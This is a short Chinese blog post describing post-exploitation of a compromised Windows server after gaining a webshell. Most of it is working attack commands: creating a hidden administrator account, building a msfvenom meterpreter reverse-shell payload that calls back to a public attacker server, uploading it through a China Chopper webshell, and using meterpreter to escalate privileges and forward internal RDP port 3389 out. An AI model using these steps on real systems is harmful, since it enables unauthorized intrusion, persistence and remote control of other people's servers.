美文网首页
getshell的进一步利用

getshell的进一步利用

作者: CSeroad | 来源:发表于2018-09-01 23:51 被阅读99次

    在上次getshell之后,已经是system的权限啦。想要控制服务器。最直接的方式是添加用户,开3389。

    添加用户

    net  user  admintest 1234qwer..  /add

    net  localgroup administrators admintest  /add

    ok

    想要远程也容易,只是这台服务器在内网。

    192.168.1.18t

    所以需要端口映射。

    推荐文章:http://www.sqlsec.com/2018/03/cloud.html#more

    打造一台外网meterpreter,使用msf马反弹shell,进行端口的转发。

    msfvenom -p windows/x64/meterpreter/reverse_tcp  LHOST=xx.xx.xx.xx LPORT=2333 -f exe > road.exe

    xx.xx.xx.xx为公网服务器,2333为公网出端口。

    road.exe木马

    将生成的msf马通过中国菜刀上传到内网服务器,触发反弹shell

    use  exploit/multi/handle

    set  payload  windows/x64/meterpreter/reverse_tcp

    set lhost 127.0.0.1

    run

    ok meterpreter

    meterpreter的命令简单应用

    getuid 当前权限

    getsystem  进行提取

    run getgui -u xxxxx  -p  xxxxx  可以在目标机器上添加用户

    portfwd add -l 3389  -r 192.168.1.18  -p  3389  将3389端口转发至本地

    现在就可以远程连接本地的3389端口。

    错误

    出现身份错误。

    解决方案:http://www.cnblogs.com/raswin/p/9018388.html

    ok success

    相关文章

      网友评论

          本文标题:getshell的进一步利用

          本文链接:https://www.haomeiwen.com/subject/yokpwftx.html